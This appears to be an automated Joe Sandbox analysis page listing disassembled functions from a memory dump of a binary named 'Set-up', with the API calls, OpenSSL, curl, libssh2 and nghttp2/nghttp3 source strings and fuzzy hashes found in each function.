Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strcpystrlen$memcmp
String ID: crypto/ocsp/ocsp_vfy.c$ocsp_match_issuerid
API String ID: 1653033214-3047229099
Opcode ID: 21d71afaa6cd4c66be1173a34110410b58e3a3c611fa9d9c38ba158d721e2520
Instruction ID: 72289a864a58f939e21e589df9adb4fa82981215ad5e7d55b829e9ceaef756bd
Opcode Fuzzy Hash: 21d71afaa6cd4c66be1173a34110410b58e3a3c611fa9d9c38ba158d721e2520
Instruction Fuzzy Hash: 5D4127A6F4430136E61036B22C87FAF32099F54758F240535FA09D92D3FEAD9A14B6A7

Function 00E48130 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 119COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000010,?,?,?,?,?,?,013B1941,?), ref: 00E481A3
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(-00000011,?,?,?,?,?,?,?,?,?,013B1941,?), ref: 00E481BD
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,?), ref: 00E4822A

Strings

dynhds.c, xrefs: 00E4817B, 00E481FE, 00E48232, 00E48265

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: dynhds.c
API String ID: 3510742995-4001380837
Opcode ID: 4e606f205459440790b7f7259d49e89ef051d3ae006307a21044afd6c62c5c63
Instruction ID: ea32963df979188b1edd4f32d824cd69bde454cead125d646d28a51c71938ed3
Opcode Fuzzy Hash: 4e606f205459440790b7f7259d49e89ef051d3ae006307a21044afd6c62c5c63
Instruction Fuzzy Hash: 8F41A171600201AFDB18DF15D981E6BB7A4EF94708F08886DED4D9B346EB70E910CB61

Function 00E88710 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00E88769
SleepConditionVariableCS.KERNEL32(?,?,000000FF), ref: 00E887D1

Part of subcall function 00E888B0: QueryPerformanceFrequency.KERNEL32(?), ref: 00E888C1
Part of subcall function 00E888B0: QueryPerformanceCounter.KERNEL32(?), ref: 00E888CC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: PerformanceQuery$ConditionCounterCriticalEnterFrequencySectionSleepVariable
String ID:
API String ID: 3112449238-0
Opcode ID: d05a9ed6352577dd446b3bee1ae3bb45d1ddcdbbb7458db1e595f0b273beea2b
Instruction ID: a668cedeb90c25387de86a791d741b7a57d2274ba85670c8117d82ded7bcb414
Opcode Fuzzy Hash: d05a9ed6352577dd446b3bee1ae3bb45d1ddcdbbb7458db1e595f0b273beea2b
Instruction Fuzzy Hash: CF31FA71F00201ABE708AA71ED45B6A77A8BB80344F94553DEC1DE7291EF31ED148791

Function 00F760E0 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00F77CCC,?,00000000,00F77127,00F77CCC,00000000,00F9CAB7,00DC1A70), ref: 00F760E3
SetLastError.KERNEL32(00000000), ref: 00F761A5

Strings

crypto/err/err.c, xrefs: 00F76275
crypto/err/err_local.h, xrefs: 00F7620C, 00F76227, 00F76257

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: ErrorLast
String ID: crypto/err/err.c$crypto/err/err_local.h
API String ID: 1452528299-2963546075
Opcode ID: f50dff3fd32e19bbd01c8c1789a3cbbc336d2e2e12d226781b90611c994f1773
Instruction ID: c832763ac7b5a3a204add7deb6eb26a1f1337b0432d90ab6859099f8ad03a791
Opcode Fuzzy Hash: f50dff3fd32e19bbd01c8c1789a3cbbc336d2e2e12d226781b90611c994f1773
Instruction Fuzzy Hash: 57314F71A4470236FB211F1CBC07B653740AB84B1CF544236FA0CA42E7E7F55824E693

Function 00DF0639 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF0646

Part of subcall function 00EAF340: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000,?,00DF00B0,?,?,00000000,00000000,?), ref: 00EAF35D

Strings

vssh/libssh2.c, xrefs: 00DF06A7, 00DF06C9
Unknown error in libssh2, xrefs: 00DF06EE, 00DF06FF
Attempt to set SFTP stats failed: %s, xrefs: 00DF0700

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Attempt to set SFTP stats failed: %s$Unknown error in libssh2$vssh/libssh2.c
API String ID: 3014104814-2439779272
Opcode ID: d6c103bd36dea40d41e1d18a0d1cf6fa6f56adb6185d11ee26d42c1a5dc03a9a
Instruction ID: 272f174fb271dab947b6f789de8ec780f535b27083b24f5750eade7e6062e5d5
Opcode Fuzzy Hash: d6c103bd36dea40d41e1d18a0d1cf6fa6f56adb6185d11ee26d42c1a5dc03a9a
Instruction Fuzzy Hash: C131F5B5A04201AFD711DF14D841BAAF7E4FF88324F158168F5985B392E371BE14CBA2

Function 00DF0584 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 73stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00DF0594

Part of subcall function 00EAEE30: _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00EAEE4F

Strings

mkdir command failed: %s, xrefs: 00DF062F
vssh/libssh2.c, xrefs: 00DF05F8
Unknown error in libssh2, xrefs: 00DF061D, 00DF062E

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _time64strlen
String ID: Unknown error in libssh2$mkdir command failed: %s$vssh/libssh2.c
API String ID: 3014104814-3060469362
Opcode ID: 8eb4d44d144e2ac8ca79428c557ae7f443ae1ecbed93b5e092c6861537f552d1
Instruction ID: e7af3899192b0af1cf39207bcdb300d9b0500faf7d60a7d2a2c1b7edac050eec
Opcode Fuzzy Hash: 8eb4d44d144e2ac8ca79428c557ae7f443ae1ecbed93b5e092c6861537f552d1
Instruction Fuzzy Hash: 4F21D6B5B04301AFD311DF68D880A6AF7E8FF88324F459568F5589B352E331ED148BA2

Function 00F34460 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 70stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000000,00F371DD,00000000,?,?), ref: 00F344AC
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(00000000,?,00000000,?,?,?,?,?), ref: 00F344FF

Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77262
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F77285
Part of subcall function 00F77220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772C5
Part of subcall function 00F77220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00F9BD91), ref: 00F772E8

Strings

crypto/asn1/asn1_lib.c, xrefs: 00F34487, 00F344DB
ASN1_STRING_set, xrefs: 00F3447D

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: strlen$strcpy$memcpy
String ID: ASN1_STRING_set$crypto/asn1/asn1_lib.c
API String ID: 1223016426-1431402185
Opcode ID: 58b38a47dd84d9c873797dda1357bd09dc0a99d5839e0807a274e8e7cd0a2801
Instruction ID: 5b0bf8c3755d30f257a11af7fd3c512e7500f45eed96f179bea4dc07955b7dd8
Opcode Fuzzy Hash: 58b38a47dd84d9c873797dda1357bd09dc0a99d5839e0807a274e8e7cd0a2801
Instruction Fuzzy Hash: B311D372E042105BDB21AD649C41B2A7698DB51734F29412AFD599F2C6EA74BC00AAF2

Function 00E6C220 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 245COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - pbuf->last) == len,nghttp3_qpack.c,00000978), ref: 00E6C4E7

Strings

nghttp3_qpack.c, xrefs: 00E6C4DD
(size_t)(p - pbuf->last) == len, xrefs: 00E6C4E2

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - pbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-3384106985
Opcode ID: 83dde1bf8951f56ce234e6afcf29e981156a86860842b20bbbd0913cbc088a64
Instruction ID: d66ea6b3ff0b831c137d5302209936a3e3b8e77dad5d2aaa296db933df613fd8
Opcode Fuzzy Hash: 83dde1bf8951f56ce234e6afcf29e981156a86860842b20bbbd0913cbc088a64
Instruction Fuzzy Hash: E7811571A483009FD704DE2CD89073AB7D2EB99754F24967CE8E99B3E2DA35DC448781

Function 00E6C520 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - rbuf->last) == len,nghttp3_qpack.c,000004D0,?,?,?,?,?,?,00E6B434,?,?,00000000,00000000,?,?), ref: 00E6C68A

Strings

nghttp3_qpack.c, xrefs: 00E6C680
(size_t)(p - rbuf->last) == len, xrefs: 00E6C685

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - rbuf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-2159148421
Opcode ID: d3cdf7f1bbcdcafa890e91b6f02e66194661036be016841714bef78dae21c3e4
Instruction ID: 13061fd16d5d30c5b4a8a005b24455c4b07fb77ebedadd17039b9ba6bdc6fecf
Opcode Fuzzy Hash: d3cdf7f1bbcdcafa890e91b6f02e66194661036be016841714bef78dae21c3e4
Instruction Fuzzy Hash: 084144717493004FD7098E28E88076EBBD2EFC8754F28967CE889DB382D935DD058782

Function 00E72600 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len,nghttp3_qpack.c,00000EB7,?,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E727D1

Strings

nghttp3_qpack.c, xrefs: 00E727C7
nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len, xrefs: 00E727CC

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: nghttp3_buf_left(dbuf) >= nghttp3_buf_len(&decoder->dbuf) + len$nghttp3_qpack.c
API String ID: 1222420520-645767172
Opcode ID: ceb84596a5873d16484e6b8b7c3b42d01255483166e7b655275d8da4cf52b546
Instruction ID: a869bcad99d9298f6ce618b613bb2fe09297839133b292f5b2bb3e4a084a80a0
Opcode Fuzzy Hash: ceb84596a5873d16484e6b8b7c3b42d01255483166e7b655275d8da4cf52b546
Instruction Fuzzy Hash: D451E875A043048FD704AF28D880B5AB3D6EF88314F19967DED9DAB392EA34DD058B51

Function 00E5C3A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 132COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 00E5C50A

Strings

0 == rv, xrefs: 00E5C505
nghttp2_map.c, xrefs: 00E5C500

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: 0 == rv$nghttp2_map.c
API String ID: 1222420520-2488825769
Opcode ID: 22c01e6376678ad62f8768b1192de9eb1e480a1a830cd0447bc59e6338c37c3a
Instruction ID: b6c445304f62f69d76246055ba9bd8c22034b1a20a23bb22da793647e8a89c97
Opcode Fuzzy Hash: 22c01e6376678ad62f8768b1192de9eb1e480a1a830cd0447bc59e6338c37c3a
Instruction Fuzzy Hash: 2451F4756087069FC310CF19D89092AFBE5FF88754F15892EE998A7310E730E959CF82

Function 00E5C220 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(data,nghttp2_map.c,000000DD), ref: 00E5C394

Part of subcall function 00E5C3A0: _assert.API-MS-WIN-CRT-RUNTIME-L1-1-0(0 == rv,nghttp2_map.c,000000CF), ref: 00E5C50A

Strings

data, xrefs: 00E5C38F
nghttp2_map.c, xrefs: 00E5C38A

Memory Dump Source

Source File: 00000000.00000002.1876409312.0000000000DC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DC0000, based on PE: true

Associated: 00000000.00000002.1876394452.0000000000DC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001273000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876668220.0000000001396000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876725117.0000000001397000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876738495.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876751079.000000000139B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876764471.000000000139F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876777354.00000000013A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014F9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876889152.00000000014FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876915185.00000000014FE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1876927995.0000000001502000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_dc0000_Set-up.jbxd

Similarity

API ID: _assert
String ID: data$nghttp2_map.c
API String ID: 1222420520-1279632610
Opcode ID: feaf60d2dfdbb2ec85a56aa7e405b51ceca81cf687d30f6e94c4ab5f7cd3e5e7
Instruction ID: d55c273c6c00b36c0367173466b0d6fa3c8c23efa10c9248169ee306f2619779
